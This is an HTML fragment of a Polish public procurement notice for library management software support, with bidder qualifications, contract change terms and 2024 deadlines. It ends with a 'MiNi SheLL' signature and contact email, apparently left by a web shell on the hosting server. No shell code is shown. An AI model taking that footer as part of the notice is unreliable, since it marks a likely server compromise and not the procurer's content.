class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu (rozdział VI SWZ) oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu (poniżej).<br/>2.	O udzielenie zamówienia w niniejszym postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1.	zdolności do występowania w obrocie gospodarczym: „Nie dotyczy” <br/>2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: „Nie dotyczy” <br/>2.3.	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia dodatkowych warunków<br/>2.4. zdolności technicznej lub zawodowej:<br/>2.4.1. Dotyczącej Wykonawcy:<br/>Wykonawca musi wykazać się wiedzą i doświadczeniem w wykonaniu, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniu, w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/> Wykonawca wykonał należycie co najmniej jedną dwie umowy obejmujące sprzedaż i wdrożenie lub wsparcie (podobne do tego opisywane w niniejszym postepowaniu), trwającą minimum 11 miesięcy każda, w zakresie oprogramowania użytkowego w zakresie systemów obsługi bibliotek publicznych.<br/> Za jedną umowę będzie uważana także umowa ramowa lub wiele zleceń realizowanych na rzecz jednego podmiotu lub działania j/w podejmowane w ramach innego stanowiska pracy związanego z funkcjonowaniem bibliotek publicznych pod warunkiem zgodności z treścią warunku co do ich przedmiotu, okresu realizacji (wszystkie zlecenia muszą być zrealizowane w okresie nie krótszym niż 11 miesięcy.<br/>2.4.2. Dotyczącej Osób<br/>O udzielenie zamówienia może ubiegać się Wykonawca, który wykaże, że skieruje do wykonania zamówienia co najmniej jedną osobę o następujących kwalifikacjach: <br/>- posiada praktyczną znajomość zasad katalogowania z użyciem formatu MARC21 dla różnych typów dokumentów (książki, wydawnictwa ciągłe, artykuły, dokumenty elektroniczne, audiobooki, ikonografia, eksponaty, kartografia, starodruki, nuty, dźwięki) oraz dla haseł wzorcowych <br/>- posiada minimum roczne doświadczenie w obsłudze formatu MARC21 dla różnych typów dokunetów (patrz tiret 1) i <br/>- posiada co najmniej roczne doświadczenie w praktycznej znajomości zasad pracy biblioteki – ewidencja zbiorów, wymagania dotyczące dokumentacji, przeprowadzanie skontrum i ubytkowania, statystyki, ewidencja wypożyczeń, ewidencja czytelników, (<br/>- posiada co najmniej roczne doświadczenie w praktycznej ą wiedzy z zakresu przetwarzania danych osobowych z uwzględnieniem RODO, <br/>- posiada praktyczną znajomość systemu operacyjnego Linux (Debian, Ubuntu), posiada praktyczną znajomość języka SQL, oraz posiada praktyczną znajomość obsługi maszyny wirtualnej JAVY,<br/>- posiada prawo jazdy kat. B,<br/>-posiada praktyczną umiejętność zdalnej pracy z wykorzystaniem protokołów SSH <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z częścią VIII SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z częścią VIII SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy<br/>1.	Wszelkie zmiany Umowy wymagają formy pisemnej od rygorem nieważności, z zastrzeżeniem że każda ze Stron może jednostronnie dokonać zmiany w zakresie numerów telefonów, adresów, numerów rachunków bankowych wskazanych w niniejszej Umowie, osób odpowiedzialnych po obu stronach za realizację Umowy, zawiadamiając niezwłocznie o tym pisemnie drugą stronę. Zawiadomienie jest skuteczne od dnia odbioru zawiadomienia przez drugą Stronę Umowy.<br/>2.	Na podstawie art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmiany niniejszej Umowy w następującym zakresie:<br/>1)	zmiana sposobu wykonania przedmiotu zamówienia i jego zakresu, dotycząca w szczególności ilości i rodzaju realizowanych usług, zakresu geograficznego działania, wraz z proporcjonalną zmianą wynagrodzenia Wykonawcy, nie większą jednak niż 10% wartości, o której mowa w §4 ust. 3;<br/>2)	zmiany zakresu podwykonawstwa oraz zmiany podwykonawców – zmiana może nastąpić, o ile będzie to zgodne z wymaganiami niniejszej umowy i SWZ, a także o ile będzie zgodna z przepisami ustawy Pzp;<br/>3)	wydłużenie terminu realizacji umowy nie dalej jednak, niż do dnia 31.01.2026 r., wraz z proporcjonalną zmianą wynagrodzenia Wykonawcy, nie większą jednak niż o 10% wartości, o której mowa w §4 ust. 3;<br/>4)	zmiana wynagrodzenia Wykonawcy, o którym mowa w §4 ust. 1-3 – w przypadku zmiany obowiązującej stawki podatku VAT;<br/>5)	ograniczenie zakresu umowy – przez jednostronne oświadczenie Zamawiającego i związaną z tym zmianę wynagrodzenia, w szczególności w przypadku wystąpienia okoliczności powodującej brak możliwości lub niecelowość wykonania przedmiotu Umowy w pełnym zakresie przewidzianym w umowie. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie odpowiednio pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. Zmiana powyższa nie może dotyczyć minimalnego gwarantowanego poziomu zamówienia, który będzie odpowiadać zakresowi przedmiotu zamówienia odpowiadającego wartości 50% maksymalnego wynagrodzenia brutto określonego w §4 ust. 3 umowy;<br/>6)	zmiana osoby pełniącej funkcję administratora w stosunku do treści oferty – wyłącznie z ważnych przyczyn i pod warunkiem wykazania przez Wykonawcę, że proponowany nowy kandydat spełnia wszystkie wymagania dla tej funkcji określone w SWZ, a także, że jego<br/> <br/>kwalifikacje	zawodowe	są	na	poziomie	nie	gorszym,	niż	kwalifikacje	zawodowe dotychczasowego administratora<br/>7)	zmiana wysokości wynagrodzenia Wykonawcy (w tym cen jednostkowych wskazanych w ofercie oraz w odpowiedniej proporcji kwoty maksymalnej określonej w § 4 ust. 3) w przypadku, gdy miesięczny wskaźnik cen towarów i usług konsumpcyjnych (liczony od grudnia poprzedniego roku) publikowany przez Główny Urząd Statystyczny przekroczy wartość 103. Zmiana w tym zakresie będzie mogła zostać dokonana nie wcześniej, niż od dnia 01.07.2025 r. i nie więcej, niż jeden raz w okresie obowiązywania umowy. Zmiana będzie dokonywana poprzez zmianę cen jednostkowych określonych w ofercie Wykonawcy za wydanie numerów czasopism przypadające po tym dniu i nastąpi poprzez przeliczenie cen jednostkowych zawartych w ofercie wg następującego wzoru:<br/>Cjn = Cj * [1 + (W – 100)/200]<br/>gdzie<br/>Cjn – nowa cena jednostkowa<br/>Cj – cena jednostkowa brutto z oferty<br/>W – wartość miesięcznego wskaźnika cen towarów i usług konsumpcyjnych ogłoszona przez GUS<br/>Stosownie do wyliczonych w ten sposób cen jednostkowych zostanie również w odpowiedniej proporcji zwiększona kwota maksymalna, określona w § 4 ust. 3 umowy, jednak nie więcej, niż o 10% wartości. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/instytutksiazki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia wyklucza się również Wykonawcę, w stosunku do którego zachodzą okoliczności, o których mowa w:<br/>1.	art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego

Creat By MiNi SheLL
Email: jattceo@gmail.com